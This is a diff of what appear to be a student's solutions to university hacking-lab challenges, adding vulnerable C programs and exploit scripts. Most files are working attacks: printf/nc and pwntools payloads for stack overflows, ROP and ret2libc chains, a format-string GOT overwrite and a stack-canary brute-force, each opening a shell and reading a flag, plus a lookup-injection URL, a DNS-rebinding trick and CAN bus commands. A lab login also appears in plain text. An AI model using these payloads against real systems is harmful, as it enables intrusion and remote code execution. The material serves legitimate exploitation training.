add binary

3/tree

@@ -0,0 +1 @@
+curl --request POST      --user tree:QMyVgCs5SPT05pDaFO6wFGWjBiAuRcXO      --header "Content-Type: application/json"      --data '{"query":"query { secretcharacter { id name description } }"}'      https://tree.web2.stud12.hacklab.ias.tu-bs.de/data

4/level1/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level1/level1.c

@@ -0,0 +1,58 @@
+// gcc -o level1 -no-pie -fno-stack-protector level1.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+struct topic {
+  char question[64];
+  char answer[32];
+  int (*check_response)(struct topic *topic);
+};
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int check_math_response(struct topic *topic) {
+  int answer = atoi(topic->answer);
+  if (answer == 0x7a69) {
+    puts("You got it.");
+    return 0;
+  } else {
+    puts("Try again.");
+    return 1;
+  }
+}
+
+int check_weather_response(struct topic *topic) {
+  if (!strcmp(topic->answer, "Yes\n")) {
+    puts("It's inevitable.");
+    return 0;
+  } else {
+    puts("Are you sure about that?");
+    return 1;
+  }
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  struct topic topics[] = {
+      {"What is 3077 * 10 + 567?", "", check_math_response},
+      {"Will it ever rain this year?", "", check_weather_response}};
+
+  srand(time(NULL));
+  struct topic *topic = &topics[rand() % 2];
+
+  puts(topic->question);
+  fgets(topic->answer, sizeof(*topic), stdin);
+  printf("addr: %X\n", topic->check_response);
+  return topic->check_response(topic);
+}

4/level1/test

@@ -0,0 +1,5 @@
+unit activation code
+32x spacer for array
+then jump address (reverse order)
+
+printf 'p90xiy6HFLfLKSyxptNlpYr1IHGlZvMS\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x36\x12\x40\00\00\00\00\00\ncat flag.txt\n' | nc binexp.stud12.hacklab.ias.tu-bs.de 4001

4/level10/test.py

@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = ELF('./level10')
+
+# Addresses
+exit_got = elf.got['exit']
+win_addr = elf.symbols['win']
+
+print("exit got: ", hex(exit_got))
+print("win     : ", hex(win_addr))
+
+# Build a fmtstr payload that rewrites exit@GOT ? win()
+# write_size='short' uses %hn twice for 2-byte writes
+
+#for i in range(1,30):
+#print("##################### ", i)
+#p = process(elf.path)
+p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
+payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+p.sendline(payload.encode())
+
+context.clear(arch = 'amd64')
+payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
+
+# Send and get shell
+p.recvuntil("talk about?".encode())
+p.sendline(payload)
+print("send: ", payload.hex())
+res = p.recvline()
+print("got: ", res)
+p.interactive()
+res = p.recvline()
+print("got: ", res)
+
+p.sendline("cat flag.txt")
+print("send cat")
+res = p.recvline()
+print("got: ", res)

4/level11/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level11/level11.c

@@ -0,0 +1,116 @@
+// gcc -o level11 -no-pie -fstack-protector-all level11.c
+#include <arpa/inet.h>
+#include <errno.h>
+#include <signal.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+const uint16_t port = 4011;
+
+void win(int fd) {
+  // Connect stdin and stdout to the client socket,
+  // so they can interact with the shell.
+  dup2(fd, STDIN_FILENO);
+  dup2(fd, STDOUT_FILENO);
+  dup2(fd, STDERR_FILENO);
+
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+void prompt(int fd) {
+  char buffer[32];
+  send(fd, "What do you want to talk about?\n", 32, 0);
+  recv(fd, buffer, 120, 0);
+}
+
+void vuln(int fd) {
+  prompt(fd);
+  send(fd, "Bye.\n", 5, 0);
+}
+
+// forking socket server with help from
+// https://github.com/pwning/docs/blob/master/fork_accept.c
+int main(int argc, char **argv) {
+  // Setting the SIGCHLD handler to SIG_IGN prevents child
+  // processes from becoming zombies (so you do not need to
+  // call wait() on them).
+  if (signal(SIGCHLD, SIG_IGN) == SIG_ERR) {
+    fputs("Failed to set SIGCHLD handler.", stderr);
+    return 1;
+  }
+
+  // Create server socket.
+  int server_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+  if (server_sock < 0) {
+    perror("socket");
+    return 1;
+  }
+
+  // Set SO_REUSEADDR. Otherwise, if the server crashes for
+  // any reason, you will have to wait for sockets to time
+  // out before you can reuse the port.
+  int opt = 1;
+  if (setsockopt(server_sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) !=
+      0) {
+    perror("setsockopt");
+    return 1;
+  }
+
+  struct sockaddr_in listen_addr = {0};
+  bzero((char *)&listen_addr, sizeof(listen_addr));
+  listen_addr.sin_family = AF_INET;
+  listen_addr.sin_port = htons(port);
+  if (inet_pton(AF_INET, "127.0.0.1", &listen_addr.sin_addr) <= 0) {
+    perror("inet_pton");
+    return 1;
+  }
+
+  if (bind(server_sock, (struct sockaddr *)&listen_addr, sizeof(listen_addr)) !=
+      0) {
+    perror("bind");
+    return 1;
+  }
+
+  if (listen(server_sock, 5) != 0) {
+    perror("listen");
+    return 1;
+  }
+
+  int client_sock;
+  pid_t child_pid;
+  while (1) {
+    client_sock = accept(server_sock, NULL, NULL);
+    if (client_sock < 0) {
+      perror("accept");
+      continue;
+    }
+
+    child_pid = fork();
+    if (!child_pid) {
+      // Avoid tons of long-running processes sticking around.
+      alarm(30);
+
+      // If you do not close the socket fd, someone who
+      // exploits the service could call accept() on it and
+      // hijack other people's connections.
+      close(server_sock);
+
+      // Call the vulnerable code with the client socket.
+      vuln(client_sock);
+      close(client_sock);
+      return 0;
+    } else {
+      // If you forget to close the client fd, you could run
+      // out of file descriptors.
+      close(client_sock);
+    }
+  }
+
+  return 0;
+}

4/level11/test.py

@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+from pwn import *
+import sys
+import time
+
+elf = ELF('./level11')
+
+# Addresses
+win_addr = elf.symbols['win']
+
+print("win     : ", hex(win_addr))
+start = "aaaaaaaabbbbbbbbccccccccdddddddd12345678".encode()
+oldflag = "hacklab{f0rm4t_7he_go7_l1ke_4_pr0_U6tZ6PMP}".encode()
+
+local = False
+
+def probe_canary(payl):
+    for i in range(0,255):
+        p = None
+        if(local):
+            p = remote("localhost", 4011)
+        else:
+            p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4011)
+            p.sendline(oldflag)
+        time.sleep(0.05)
+        p.recvuntil("talk about?".encode())
+        payload = payl + i.to_bytes(1, 'little')
+        p.send(payload)
+        print(payload)
+        resp = p.recvall(timeout=0.1);
+        if(resp == b'\nBye.\n'):
+            print("found byte ", end='')
+            print(hex(i))
+            if(len(payload) >= 56):
+                return payload
+            else:
+                return probe_canary(payload)
+
+canary = probe_canary(start)
+payload = canary + p64(win_addr)
+
+print(payload)
+print(payload[40:47].hex())
+print(payload[48:55].hex())
+print(payload[56:63].hex())
+
+p = None
+if(local):
+    p = remote("localhost", 4011)
+else:
+    p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4011)
+    p.sendline(oldflag)
+
+print(p.readline())
+p.sendline(payload)
+p.sendline("cat flag.txt; exit".encode())
+print(p.recvall())

4/level2/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level2/level2.c

@@ -0,0 +1,22 @@
+// gcc -o level2 -no-pie -fno-stack-protector level2.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}

4/level2/test

@@ -0,0 +1,7 @@
+last key
+32 byte filler
+overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
+overwrite rip with address of win
+
+printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
+cat input.txt | nc binexp.stud12.hacklab.ias.tu-bs.de 4002

4/level3/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level3/level3.c

@@ -0,0 +1,24 @@
+// gcc -o level3 -no-pie -fno-stack-protector level3.c
+#include <stdio.h>
+#include <unistd.h>
+
+const char command[] = "/bin/sh";
+
+void win(char *cmd) {
+  char *argv[2];
+  argv[0] = cmd;
+  argv[1] = NULL;
+  execve(cmd, argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}

4/level3/test

@@ -0,0 +1,7 @@
+padding
+saved rbp
+gadget address (pop rdi, ret)
+command address (going to rdi)
+win function address (to be called with command addr in rdi as parameter)
+
+printf 'hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\xc3\x12\x40\00\00\00\00\00\x08\x20\x40\00\00\00\00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt

4/level3/test.sh

@@ -0,0 +1,8 @@
+OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
+GADGET1="\xc3\x12\x40\00\00\00\00\00"
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt

4/level4/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level4/level4.c

@@ -0,0 +1,19 @@
+// gcc -o level4 -no-pie -fno-stack-protector level4.c
+#include <stdio.h>
+#include <stdlib.h>
+
+const char command[] = "/bin/sh";
+
+void win(const char *cmd) { system(cmd); }
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}

4/level4/test.sh

@@ -0,0 +1,9 @@
+OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\xa4\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\xa3\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt

4/level5/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level5/level5.c

@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include <stdio.h>
+#include <stdlib.h>
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  system("echo Bye.");
+  return 0;
+}

4/level5/test.sh

@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g     O .data	0000000000000008              command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"

4/level6/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level6/level6.c

@@ -0,0 +1,27 @@
+// gcc -o level6 -no-pie -fstack-protector level6.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win(void) {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[64];
+  while (1) {
+    puts("What do you want to talk about?");
+    read(0, buffer, 128);
+    if (buffer[0] == '\0' || buffer[0] == '\n') break;
+
+    printf("I can't talk about %s.\n", buffer);
+  }
+  puts("Bye.");
+  return 0;
+}

4/level6/test.sh

@@ -0,0 +1,30 @@
+# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
+
+#objdump
+#00000000004011d6 g     F .text	000000000000003a              win
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
+CMDCALL="\xd6\x11\x40\00\00\00\00\00"
+
+read
+read
+printf "$OLDFLAG"
+read
+read
+
+printf "$PADDING""AAAAAAAA\n"
+read
+read
+read canary
+>&2 echo "read canary: "$(echo "$canary" | hd)
+read input
+>&2 echo $input
+
+>&2 echo "writing canary + exploit"
+printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
+read input
+>&2 echo "should be bye: "$input
+printf "cat flag.txt\n"
+read input
+>&2 echo "should be shell: "$input

4/level7/test.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+from pwn import *
+
+BINARY = "./level7"
+HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
+#HOST, PORT = "localhost", 4007
+
+elf = ELF(BINARY, checksec=False)
+
+def main():
+    # 1) start remote
+    p = remote(HOST, PORT)
+
+    # 2) read the question
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    ##############
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    # 3) build payload
+    #offset = 32
+    win    = elf.symbols['win']
+    #payload  = b"A"*offset
+    #payload += 0xa6#p64(win)
+    #payload += b"\n"
+    payload = "%7$p %9$p"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    leak = p.recvline(timeout=999)
+    print("[+] leak:", leak)
+    canary  = int(leak[-35:-17],16)
+    pieaddr = int(leak[-16:-2],16)
+    print("[+] canary:", hex(canary))
+    print("[+] pieaddr:", hex(pieaddr))
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    p.sendline("admin".encode())
+    print("sending username \"admin\"")
+
+    question = p.recvline(timeout=999)
+    print("[+] got username msg:", question.decode().strip())
+
+    question = p.recv(timeout=999)
+    print("[+] got password prompt:", question.decode().strip())
+
+    payload  = b"A"*40
+    payload += p64(canary)
+    payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
+    payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
+    p.sendline(payload)
+    print("sending payload: ", payload)
+
+    question = p.recvline(timeout=999)
+    print("[+] got login msg:", question.decode().strip())
+
+
+    # 5) we should now have a shell
+    p.interactive()
+
+if __name__ == "__main__":
+    main()

4/level8/test.py

@@ -0,0 +1,52 @@
+# 0x0000000000401293 : pop rdi ; ret
+
+from pwn import *
+
+HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008
+p = remote(HOST, PORT)
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+payload = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
+p.sendline(payload.encode())
+print("sending: ", end='')
+print(payload)
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+question = p.recvline(timeout=2)
+print("[+] question:", question.decode().strip())
+
+#p = process('./level8')
+
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+puts_offset   = libc.symbols['puts']           # e.g. 0x080aa0
+system_offset = libc.symbols['system']         # e.g. 0x04f550
+binsh_offset  = next(libc.search(b'/bin/sh'))  # e.g. 0x1b75aa
+
+print(hex(puts_offset))
+print(hex(system_offset))
+print(hex(binsh_offset))
+
+#help_input = p.recvline()
+help_input = p.recvline()
+print(help_input)
+puts_abs = int(help_input[-15:-1],16)
+print(hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+
+payload  = b'A'*40
+payload += p64(0x0000000000401294)
+payload += p64(0x0000000000401293)
+payload += p64(puts_abs - puts_offset + binsh_offset)
+payload += p64(puts_abs - puts_offset + system_offset)
+p.sendline(payload)
+
+print("payload: ",payload)
+
+p.interactive()

4/level9/test.py

@@ -0,0 +1,78 @@
+# 0x0000000000401263 : pop rdi ; ret
+
+from pwn import *
+
+HOST, PORT = "localhost", 4009
+#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
+#p = remote(HOST, PORT)
+p = process('./level9')
+
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+#p.sendline(payload.encode())
+#print("sending: ", end='')
+#print(payload)
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+
+
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+puts_offset   = libc.symbols['puts']           # e.g. 0x080aa0
+system_offset = libc.symbols['system']         # e.g. 0x04f550
+binsh_offset  = next(libc.search(b'/bin/sh'))  # e.g. 0x1b75aa
+
+print(hex(puts_offset))
+print(hex(system_offset))
+print(hex(binsh_offset))
+
+elf = ELF('./level9')
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+main = elf.symbols['main']
+
+#help_input = p.recvline()
+#print(help_input)
+#puts_abs = int(help_input[-15:-1],16)
+#print(hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+payload  = b'A'*40
+payload += p64(0x0000000000401264)
+payload += p64(0x0000000000401263)
+payload += p64(puts_got)
+payload += p64(puts_plt)
+payload += p64(main)
+p.sendline(payload)
+print("send payload: ", payload)
+
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+puts_abs = int.from_bytes(leak[:-1], 'little')
+print("[+] leaked puts:", hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+
+payload  = b'A'*40
+#payload += p64(0x0000000000401264)
+payload += p64(0x0000000000401263)
+payload += p64(puts_abs - puts_offset + binsh_offset)
+payload += p64(puts_abs - puts_offset + system_offset)
+p.sendline(payload)
+
+print("payload: ",payload)
+
+p.sendline("cat flag.txt".encode())
+p.interactive()

5/leakchecker1

@@ -0,0 +1 @@
+https://leakchecker1.web3.stud12.hacklab.ias.tu-bs.de/search?email=%24%7Benv%3AFLAG%7D

5/screenr2/index.html

@@ -0,0 +1,2 @@
+<iframe src="http://localhost:9000/flag" name="iframe" id="iframe" scrolling="yes" frameborder="0" marginheight="0px" marginwidth="0px" height="2400" width="6000" style="zoom: 0.75">
+</iframe>

5/screenr2/server.py

@@ -0,0 +1,13 @@
+#!/usr/bin/env python3
+from http.server import SimpleHTTPRequestHandler, HTTPServer
+
+PORT = 8000
+
+def run_server():
+    handler = SimpleHTTPRequestHandler
+    httpd = HTTPServer(("", PORT), handler)
+    print(f"Serving HTTP on port {PORT} (http://localhost:{PORT}/) …")
+    httpd.serve_forever()
+
+if __name__ == "__main__":
+    run_server()

5/screenr3/txt

@@ -0,0 +1,5 @@
+try multiple times:
+
+http://7f000001.c0a80001.rbndr.us:9000/flag
+
+dns switches randomly between allowed and not allowed address

6/CANformation2

@@ -0,0 +1 @@
+candump -c getvin,65F:7FF -a

6/CANsmit1

@@ -0,0 +1,36 @@
+cansmit1@hacklab-vehnet-stud12:~$ isotpdump -s 123 -d 321 twowires | sed -E 's/^[^W]*data: ([0-9A-Z ]*)$/\1/'& PID=$!; sleep 1.5; cansend twowires 123#3000000000000000; sleep 0.01; kill $PID
+[1] 1234726
+1F 8B 08 00 00 00 
+1F 8B 08 00 00 00 
+ twowires  123  [8]  [FC] FC: 0 = CTS # BS: 0 = off # STmin: 0x00 = 0 ms
+00 00 00 03 CB 48 4C 
+CE CE 49 4C AA 4E 36 
+C8 2B 29 32 C8 89 37 
+C9 4B 89 2F 32 4E 4E 
+35 2C 4B 8D 2F 37 2C 
+C9 88 4F C9 4C 4B 33 
+2E 4A CD 33 8F 77 36 
+F1 8B 37 74 29 8E 2F 
+0C F5 34 76 73 0B 4B 
+AB E5 02 00 4F 84 76 
+1F 3D 00 00 00 
+cansmit1@hacklab-vehnet-stud12:~$ 
+[1]+  Terminated              isotpdump -s 123 -d 321 twowires | sed -E 's/^[^W]*data: ([0-9A-Z ]*)$/\1/'
+cansmit1@hacklab-vehnet-stud12:~$ cat blob.txt 
+1F 8B 08 00 00 00
+00 00 00 03 CB 48 4C
+CE CE 49 4C AA 4E 36
+C8 2B 29 32 C8 89 37
+C9 4B 89 2F 32 4E 4E
+35 2C 4B 8D 2F 37 2C
+C9 88 4F C9 4C 4B 33
+2E 4A CD 33 8F 77 36
+F1 8B 37 74 29 8E 2F
+0C F5 34 76 73 0B 4B
+AB E5 02 00 4F 84 76
+1F 3D 00 00 00 
+cansmit1@hacklab-vehnet-stud12:~$ xxd -r -p blob.txt > blob.gz
+cansmit1@hacklab-vehnet-stud12:~$ gunzip blob.gz 
+gzip: blob already exists; do you wish to overwrite (y or n)? y
+cansmit1@hacklab-vehnet-stud12:~$ cat blob
+hacklab{c0ntr0l_4nd_r3ce1ve_w1th_diff3ren7_C4N_1Ds_qUI3FFVf}

6/CANsmit2/sortuniq

@@ -0,0 +1,189 @@
+89 50 4E 47 0D 0A 1A
+0A 00 00 00 0D 49 48
+44 52 00 00 01 68 00
+00 00 F8 02 03 00 00
+00 BC 9A 94 B1 00 00
+00 04 67 41 4D 41 00
+00 B1 8F 0B FC 61 05
+00 00 00 20 63 48 52
+4D 00 00 7A 26 00 00
+80 84 00 00 FA 00 00
+00 80 E8 00 00 75 30
+00 00 EA 60 00 00 3A
+98 00 00 17 70 9C BA
+51 3C 00 00 00 09 50
+4C 54 45 A8 A8 FE 42
+42 E7 FF FF FE CD 44
+BB C2 00 00 00 01 62
+4B 47 44 02 66 0B 7C
+64 00 00 00 09 70 48
+59 73 00 00 0B 13 00
+00 0B 13 01 00 9A 9C
+18 00 00 00 07 74 49
+4D 45 07 EA 01 13 0D
+23 20 89 D8 87 7F 00
+00 04 0A 49 44 41 54
+78 DA ED 9B 4D 6E E4
+38 0C 85 25 A0 B8 F7
+A2 78 1F 6A D1 7B 0E
+20 DD FF 2A C3 47 CA
+2E C7 63 A7 DD E8 6A
+4C 3A 20 53 55 B1 F5
+F3 85 7A A4 E8 04 88
+4A 49 4B 4B 4B 4B 4B
+4B FB 2E 36 DE 6C 89
+4E F4 D7 44 2B 29 35
+6D AA 24 6C 6F 92 8A
+B6 D1 C6 10 EA 8C 5E
+BB 1B AD E1 F3 16 BA
+4D 8B 2B 31 B3 6F 34
+9B AC 6D D4 C0 B5 D6
+79 1D B5 9F F5 09 3A
+BC 71 7F 6C 82 14 29
+6D 37 AF 8D 5E 27 68
+18 3A 7E 58 DB CF FA
+04 FD BA 07 BA 2D F6
+E5 66 82 30 A4 68 2E
+88 54 A5 0D 4D FB 59
+B7 BD 86 D6 13 3D 41
+52 A6 08 6D 45 EB B8
+E9 F5 47 AD 27 9A FC
+BD 2D 3F 46 84 D6 3A
+DB 6F 68 7D 95 21 E6
+EF 2E 43 10 C8 F0 B2
+33 DA BF 4E 5E 27 3A
+D1 DF 01 8D 9D D6 66
+35 46 61 50 DF 73 52
+A5 7A 99 98 75 A2 73
+E7 8F 15 5B 7C A7 A2
+60 D9 75 15 9F 71 40
+A3 16 37 8A 6A 2C B2
+AB 14 03 77 AF 7B A0
+8F 15 1B A3 FC DA BD
+6B 47 AF 51 8B 85 E7
+23 60 2D AA C3 D1 21
+57 D4 2B 56 3E 56 EC
+89 1E 97 68 5F D8 88
+6A DC 96 97 00 56 4E
+17 90 3B EE EB 2A C8
+AB 62 CB 1C E5 82 30
+EA 3A 1C 3C 08 62 CF
+14 4C E3 16 45 D8 7C
+89 AA 1C 5A 8F 59 A5
+3B 1F 2B 36 DA 5C 0D
+7B 09 9F 09 82 D5 40
+6B 0A 74 68 F9 42 7F
+D4 FA 55 B1 57 F4 D4
+9A 4E D0 6B 86 84 A4
+B8 47 16 A0 1E EF 33
+24 E2 BF AF D8 E2 59
+13 19 E2 CF D3 FF 66
+C8 DF B9 65 12 9D E8
+FF 09 8D 82 E3 A5 A8
+FD 3E F6 80 C6 1E B7
+1A 4C 7F 08 7D FC 95
+F0 7D 82 A0 10 5D FC
+F9 F0 7B 68 6E F3 79
+F1 7E 41 C8 D1 14 F5
+F8 BD E8 06 39 84 FF
+00 FA 3D 32 9C A2 DF
+0D 4F 74 A2 BF 02 FA
+BD E0 44 27 3A D1 89
+4E 74 A2 13 9D E8 44
+27 3A D1 89 4E 74 A2
+13 9D E8 44 27 3A D1
+89 4E 74 A2 13 9D E8
+44 27 3A D1 89 4E 74
+A2 13 9D E8 44 27 3A
+D1 89 4E F4 F7 42 77
+9A AD 3A 86 C4 37 9C
+82 1B BD C4 F5 F0 7F
+E2 F7 6B 2D E8 90 6E
+D3 EA E8 1C DD 5A 07
+0E 4A C8 2F A0 B5 F0
+6B FC 11 4D 05 68 EF
+96 E2 C7 20 80 BF 81
+F6 26 B1 CF 89 AE B3
+3D 16 F1 4F E7 4E 85
+57 74 8D C3 11 FD 17
+D0 38 54 17 A1 E8 04
+97 36 34 28 D5 D1 DE
+4D 9D 2E D1 8F 3A A4
+E2 B4 07 BC 2B A4 62
+83 3B D4 74 B9 6D EE
+83 3A 7B 77 A0 C5 D1
+D6 66 DD 5A 89 C6 A3
+70 59 4E D1 F6 E1 2F
+ED 64 32 56 13 D4 DC
+2C 36 65 74 3F 7A 52
+1E E6 61 74 97 0D 5D
+71 16 65 31 A1 1D FD
+2C E5 14 5D F5 49 98
+A7 CA A2 8C 03 39 F8
+19 F4 30 9F DC 4D 9B
+D5 9F D1 5D 22 08 A6
+75 6D 9D 15 0B 31 34
+35 E5 73 34 F5 27 AB
+BD 54 86 A8 BD 58 A1
+1E 95 C2 71 3E 04 FE
+CD EE E7 96 21 55 FC
+B8 91 69 67 6B B4 0B
+B9 40 5B 86 3E ED 5D
+10 46 A3 DB 4D 03 91
+EA 0E 8D 6E 3F F6 E9
+68 B6 A5 DA 1B 68 5B
+8A A3 E9 1C 2D 65 45
+9B A6 43 17 47 0F A2
+03 DA 8F DD 84 83 D5
+9A C8 D1 16 49 A0 47
+3D 47 17 47 2F 0C 87
+80 06 02 E1 F1 2D B2
+A2 17 FE 80 7E 58 EC
+2A C1 D9 40 B7 73 AD
+C9 96 D7 3D 94 0C 41
+2C 98 E3 C7 0E 8D 68
+A0 FB C7 0E 3D 36 74
+68 3D E8 93 30 2E 40
+47 18 0D 5D 4D 90 31
+05 A1 D9 DD F6 E8 82
+1A B2 0B E3 15 5A CC
+71 6C 19 1D 25 92 6F
+E0 73 A2 07 72 D3 BB
